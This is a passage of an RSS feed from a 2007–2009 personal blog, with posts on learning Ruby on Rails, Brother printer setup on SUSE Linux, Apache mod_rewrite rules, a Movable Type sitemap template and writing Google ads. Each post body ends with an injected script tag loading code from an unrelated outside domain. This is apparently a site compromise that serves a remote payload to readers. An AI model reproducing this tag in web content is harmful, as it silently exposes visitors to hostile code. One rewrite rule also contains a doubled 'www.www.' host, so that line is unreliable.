<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Microplop &#187; Tips and tricks</title>
	<atom:link href="http://www.microplop.com/post/category/tips/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.microplop.com</link>
	<description>Ruby on Rails, rants and code from Andy Callaghan</description>
	<lastBuildDate>Mon, 18 May 2009 22:22:13 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Steps to learn Ruby on Rails</title>
		<link>http://www.microplop.com/post/steps-to-learn-ruby-on-rails/</link>
		<comments>http://www.microplop.com/post/steps-to-learn-ruby-on-rails/#comments</comments>
		<pubDate>Sun, 12 Apr 2009 21:16:41 +0000</pubDate>
		<dc:creator>Andy Callaghan</dc:creator>
				<category><![CDATA[Final project]]></category>
		<category><![CDATA[Open source]]></category>
		<category><![CDATA[Rails]]></category>
		<category><![CDATA[Tips and tricks]]></category>
		<category><![CDATA[lists]]></category>
		<category><![CDATA[Ruby on Rails]]></category>
		<category><![CDATA[tutorial]]></category>

		<guid isPermaLink="false">http://www.microplop.com/?p=299</guid>
		<description><![CDATA[I have pretty sucessfully taught myself Ruby on Rails from scratch with no real help from any one resource or book &#8211; in this post I will show you in some steps on how to learn the basics of Ruby on Rails, as well as some of the more detailed and difficult concepts to grasp.
In [...]]]></description>
			<content:encoded><![CDATA[<p>I have pretty sucessfully taught myself Ruby on Rails from scratch with no real help from any one resource or book &#8211; in this post I will show you in some steps on how to learn the basics of Ruby on Rails, as well as some of the more detailed and difficult concepts to grasp.</p>
<p>In this post I will assume that you have already programmed in an interpreted or compiled language &#8211; C++, Java, Perl, Python are all perfect starts to a programming career.</p>
<p>Make sure you read all of this article before you begin, so you can see how your Rails skills will develop.</p>
<h3>Start hacking</h3>
<p>This is how all good programmers begin: with a weekend of time and an old fashioned hack-a-thon. I personally started with building a simple recipe app with collections of recipes in according to ingredients etc&#8230; </p>
<ul>
<li>Install Ruby, Rails and Gems and get them working</li>
<li>If you&#8217;re on Windows, you need a Linux virtual machine to do your development in. You&#8217;ll have A LOT of problems with Rails&#8217; incompatibilities with Windows. Just do it, trust me!</li>
<li>Make the simple &#8216;Hello World&#8217; app.</li>
<li>Hack away.</li>
</ul>
<p>It is up to you this stage however.</p>
<h3>Buy a few decent books</h3>
<p>It&#8217;s all good me saying &#8220;Just get stuck in&#8221;, but I did need a lot of physical textual help with my learning curve of Ruby on Rails more complex areas. Not all the books that I bought were helpful or even in date, but there was a few that I found were invaluable to my learning.</p>
<h4>Book one: Advanced Rails Recipes</h4>
<h4>Book two: RailsSpace</h4>
<h4>Book three: Rails Recipes</h4>
<p> </p>
<h3>Subscribe to Railscasts</h3>
<p>Ryan Bates presents a weekly video podcast in all areas of Rails. The later episodes tend toward more advanced areas of Rails, but if you get all of the episodes, you will find it difficult to get stuck with development in Rails.<br />
<a href="http://www.railscasts.com">www.railscasts.com</a><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.microplop.com/post/steps-to-learn-ruby-on-rails/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Brother MFC 215c printing in Suse 10.2</title>
		<link>http://www.microplop.com/post/brother-mfc-215c-printing-in-suse-102/</link>
		<comments>http://www.microplop.com/post/brother-mfc-215c-printing-in-suse-102/#comments</comments>
		<pubDate>Sun, 12 Aug 2007 20:59:32 +0000</pubDate>
		<dc:creator>Andy Callaghan</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Tips and tricks]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[This may be very specific all of a sudden, but I&#39;ve been having a few problems installing my Brother MFC 215c printer on Linux.
To aid anyone that needs to know, this is how ya do it&#8230;

&#160;Download the CUPS wrapper for the driver.
Download the LPR printer driver.
Simply double click LPR driver to install
Install the wrapper using [...]]]></description>
			<content:encoded><![CDATA[<p>This may be very specific all of a sudden, but I&#39;ve been having a few problems installing my Brother MFC 215c printer on Linux.</p>
<p>To aid anyone that needs to know, this is how ya do it&#8230;</p>
<ol>
<li>&nbsp;Download the <a href="http://solutions.brother.com/Library/sol/printer/linux/rpmfiles/cups_wrapper/cupswrapperMFC210C-1.0.0-1.i386.rpm">CUPS wrapper for the driver</a>.</li>
<li>Download the <a href="http://solutions.brother.com/Library/sol/printer/linux/rpmfiles/lpr_others/MFC210Clpr-1.0.2-1.i386.rpm">LPR printer driver.</a></li>
<li>Simply double click LPR driver to install</li>
<li>Install the wrapper using these commands:</li>
</ol>
<ul>
<li>Hit Alt-F2 to get the run dialoug</li>
<li>Type in &quot;&nbsp; konsole &#8211;type=su&nbsp;&nbsp; &quot;</li>
<li>When asked, enter in root password.</li>
<li>Change to the director of the downloaded rpm wrapper using the command &quot; cd /home/andy/ &quot; for example.</li>
<li>&quot;&nbsp;&nbsp; rpm -ihv -nodeps MFC210Clpr-1.0.2-1.i386.rpm&nbsp;&nbsp;&nbsp;&nbsp; &quot;</li>
<li>After that last command hit Alt-F2 again, type in &#39;Cups&#39;</li>
<li>Go to the &#39;Administration&#39; tab at the top.</li>
<li>Click &#39;Add this printer&#39; next to the MFC 210C option.</li>
</ul>
<p>You&#39;re done!<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.microplop.com/post/brother-mfc-215c-printing-in-suse-102/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mod_rewrite underscores as dashes in URLs</title>
		<link>http://www.microplop.com/post/mod_rewrite-underscores-as-dashes-in-urls/</link>
		<comments>http://www.microplop.com/post/mod_rewrite-underscores-as-dashes-in-urls/#comments</comments>
		<pubDate>Tue, 24 Jul 2007 17:24:57 +0000</pubDate>
		<dc:creator>Andy Callaghan</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Tips and tricks]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[At work I was faced with a problem &#8212; to rewrite all the URLs of a website that have underscores in, to dashes. This is to aid a painful transition to manage the website with the MODx php CMS.
Here is the mod_rewrite code that converts any underscores in an URL to dashes.
&#160;# Rewrite underscores for [...]]]></description>
			<content:encoded><![CDATA[<p>At work I was faced with a problem &#8212; to rewrite all the URLs of a website that have underscores in, to dashes. This is to aid a painful transition to manage the website with the MODx php CMS.</p>
<p>Here is the mod_rewrite code that converts any underscores in an URL to dashes.</p>
<p>&nbsp;# Rewrite underscores for dashes in URLs&nbsp; &#8211; upto 6 underscores<br />RewriteCond %{REQUEST_URI} ^(.*)_(.*)/$<br />RewriteRule (.*)_(.*)/ http://www.microplop.com$1-$2/ [R=301]</p>
<p>RewriteCond %{REQUEST_URI} ^(.*)_(.*)_(.*)/$<br />RewriteRule (.*)_(.*)_(.*)/ http://www.microplop.com$1-$2-$3/ [R=301]</p>
<p>RewriteCond %{REQUEST_URI} ^(.*)_(.*)_(.*)_(.*)/$<br />RewriteRule (.*)_(.*)_(.*)_(.*)/ http://www.microplop.com$1-$2-$3-$4/ [R=301]</p>
<p>RewriteCond %{REQUEST_URI} ^(.*)_(.*)_(.*)_(.*)_(.*)/$<br />RewriteRule (.*)_(.*)_(.*)_(.*)_(.*)/ http://www.microplop.com$1-$2-$3-$4-$5/ [R=301]</p>
<p>RewriteCond %{REQUEST_URI} ^(.*)_(.*)_(.*)_(.*)_(.*)_(.*)/$<br />RewriteRule (.*)_(.*)_(.*)_(.*)_(.*)_(.*)/ http://www.www.microplop.com$1-$2-$3-$4-$5-$6/ [R=301]</p>
<p>RewriteCond %{REQUEST_URI} ^(.*)_(.*)_(.*)_(.*)_(.*)_(.*)_(.*)/$<br />RewriteRule (.*)_(.*)_(.*)_(.*)_(.*)_(.*)_(.*)/ http://www.microplop.com$1-$2-$3-$4-$5-$6-$7/ [R=301]<br />&nbsp;</p>
<p>Hope this helps&nbsp;</p>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.microplop.com/post/mod_rewrite-underscores-as-dashes-in-urls/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Google Sitemap template for Movable Type</title>
		<link>http://www.microplop.com/post/google-sitemap-template-for-movable-type/</link>
		<comments>http://www.microplop.com/post/google-sitemap-template-for-movable-type/#comments</comments>
		<pubDate>Tue, 26 Jun 2007 02:14:54 +0000</pubDate>
		<dc:creator>Andy Callaghan</dc:creator>
				<category><![CDATA[Google]]></category>
		<category><![CDATA[Tips and tricks]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[I got annoyed that all the current Google happy site maps for Movable Type out there are not complete, and do not span you&#39;re entire site&#39;s pages&#8230; therefore I made another one. Feel free to take it and play, so long as the top notice is kept. 
&#60;?xml version=&#39;1.0&#39; encoding=&#39;UTF-8&#39;?&#62;&#160;&#160;&#160; &#60;urlset xmlns=&#34;http://www.google.com/schemas/sitemap/0.84&#34;&#160;&#160;&#160; xmlns:xsi=&#34;http://www.w3.org/2001/XMLSchema-instance&#34;&#160;&#160;&#160; xsi:schemaLocation=&#34;http://www.google.com/schemas/sitemap/0.84&#160;&#160;&#160; http://www.google.com/schemas/sitemap/0.84/sitemap.xsd&#34;&#62;
&#60;!&#8211; [...]]]></description>
			<content:encoded><![CDATA[<p>I got annoyed that all the current Google happy site maps for Movable Type out there are not complete, and do not span you&#39;re entire site&#39;s pages&#8230; therefore I made another one. Feel free to take it and play, so long as the top notice is kept. </p>
<blockquote><p><em>&lt;?xml version=&#39;1.0&#39; encoding=&#39;UTF-8&#39;?&gt;<br />&nbsp;&nbsp;&nbsp; &lt;urlset xmlns=&quot;http://www.google.com/schemas/sitemap/0.84&quot;<br />&nbsp;&nbsp;&nbsp; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot;<br />&nbsp;&nbsp;&nbsp; xsi:schemaLocation=&quot;http://www.google.com/schemas/sitemap/0.84<br />&nbsp;&nbsp;&nbsp; http://www.google.com/schemas/sitemap/0.84/sitemap.xsd&quot;&gt;</em></p></blockquote>
<blockquote><p>&lt;!&#8211; Google XML Sitemap Template for Movable Type by Andy Callaghan &#8211;&gt;&nbsp;</p></blockquote>
<blockquote><p><em>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;url&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;loc&gt;&lt;$MTBlogURL$&gt;&lt;/loc&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;priority&gt;1.0&lt;/priority&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;MTEntries lastn=&quot;1&quot;&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;lastmod&gt;&lt;$MTEntryModifiedDate format=&quot;%Y-%m-%d&quot;$&gt;&lt;/lastmod&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/MTEntries&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;changefreq&gt;daily&lt;/changefreq&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/url&gt;</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;url&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;loc&gt;&lt;$MTBlogURL$&gt;archives.html&lt;/loc&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;priority&gt;0.9&lt;/priority&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;MTEntries lastn=&quot;1&quot;&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;lastmod&gt;&lt;$MTEntryModifiedDate format=&quot;%Y-%m-%d&quot;$&gt;&lt;/lastmod&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/MTEntries&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;changefreq&gt;daily&lt;/changefreq&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/url&gt;</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;MTEntries lastn=&quot;5&quot;&gt;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &lt;url&gt;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &lt;loc&gt;&lt;$MTEntryPermalink$&gt;&lt;/loc&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &lt;lastmod&gt;&lt;$MTEntryModifiedDate format=&quot;%Y-%m-%d&quot;$&gt;&lt;/lastmod&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;changefreq&gt;weekly&lt;/changefreq&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;priority&gt;0.8&lt;/priority&gt;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &lt;/url&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/MTEntries&gt;</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;MTEntries lastn=&quot;5&quot; offset=&quot;5&quot;&gt;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &lt;url&gt;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &lt;loc&gt;&lt;$MTEntryPermalink$&gt;&lt;/loc&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &lt;lastmod&gt;&lt;$MTEntryModifiedDate format=&quot;%Y-%m-%d&quot;$&gt;&lt;/lastmod&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;changefreq&gt;weekly&lt;/changefreq&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;priority&gt;0.7&lt;/priority&gt;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &lt;/url&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/MTEntries&gt;</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;MTEntries lastn=&quot;10&quot; offset=&quot;10&quot;&gt;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &lt;url&gt;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &lt;loc&gt;&lt;$MTEntryPermalink$&gt;&lt;/loc&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &lt;lastmod&gt;&lt;$MTEntryModifiedDate format=&quot;%Y-%m-%d&quot;$&gt;&lt;/lastmod&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;changefreq&gt;weekly&lt;/changefreq&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;priority&gt;0.6&lt;/priority&gt;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &lt;/url&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/MTEntries&gt;</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;MTEntries lastn=&quot;1000&quot; offset=&quot;20&quot;&gt;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &lt;url&gt;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &lt;loc&gt;&lt;$MTEntryPermalink$&gt;&lt;/loc&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &lt;lastmod&gt;&lt;$MTEntryModifiedDate format=&quot;%Y-%m-%d&quot;$&gt;&lt;/lastmod&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;changefreq&gt;weekly&lt;/changefreq&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;priority&gt;0.5&lt;/priority&gt;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &lt;/url&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/MTEntries&gt;</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;MTTopLevelCategories&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;url&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;loc&gt;&lt;$MTCategoryArchiveLink$&gt;&lt;/loc&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;changefreq&gt;weekly&lt;/changefreq&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;priority&gt;0.8&lt;/priority&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;MTEntries lastn=&quot;1&quot; category=&quot;&lt;$MTCategoryLabel$&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;lastmod&gt;&lt;$MTEntryModifiedDate format=&quot;%Y-%m-%d&quot;$&gt;&lt;/lastmod&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/MTEntries&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/url&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/MTTopLevelCategories&gt;</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;MTArchiveList archive_type=&quot;Monthly&quot;&gt;</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;url&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;loc&gt;&lt;$MTArchiveLink$&gt;&lt;/loc&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;changefreq&gt;monthly&lt;/changefreq&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;priority&gt;0.6&lt;/priority&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/url&gt;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/MTArchiveList&gt;</p>
<p>&nbsp;&nbsp;&nbsp; &lt;/urlset&gt;</em></p></blockquote>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.microplop.com/post/google-sitemap-template-for-movable-type/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to write better Google ads</title>
		<link>http://www.microplop.com/post/how-to-write-better-google-ads/</link>
		<comments>http://www.microplop.com/post/how-to-write-better-google-ads/#comments</comments>
		<pubDate>Fri, 18 May 2007 12:35:08 +0000</pubDate>
		<dc:creator>Andy Callaghan</dc:creator>
				<category><![CDATA[Google]]></category>
		<category><![CDATA[Tips and tricks]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[The following is a list of the easiest and strongest ways to make you Google Adwords more effective:

Plan the adThis may sound obvious, but so many people don&#39;t do it. Plan the ad&#39;s words and selling point&#160;carefully before&#160;making the ad.&#160;This will avoid nearly all grammatical and spelling errors.
Use rhythmic techniquesTo spice up the mental sound [...]]]></description>
			<content:encoded><![CDATA[<p>The following is a list of the easiest and strongest ways to make you Google Adwords more effective:</p>
<ol>
<li>Plan the ad<br />This may sound obvious, but so many people don&#39;t do it. Plan the ad&#39;s words and selling point&nbsp;carefully before&nbsp;making the ad.&nbsp;This will avoid nearly all grammatical and spelling errors.</li>
<li>Use rhythmic techniques<br />To spice up the mental sound of an advert, you can use Haiku &#8211; a traditional Japanese poetry writing technique. In Haiku, each line has a set number of syllables usually 5 on first then 7 then 5 again and so on. Here&#39;s an example of Haiku:
<div align="center"><strong>Easy Revision</strong><br />Learn from the Computing Pros,<br />Storm through your exams!<br /><em>www.Microplop.com<br /></em>
<div align="left">This ad may not stand out straight away but if read,&nbsp; </div>
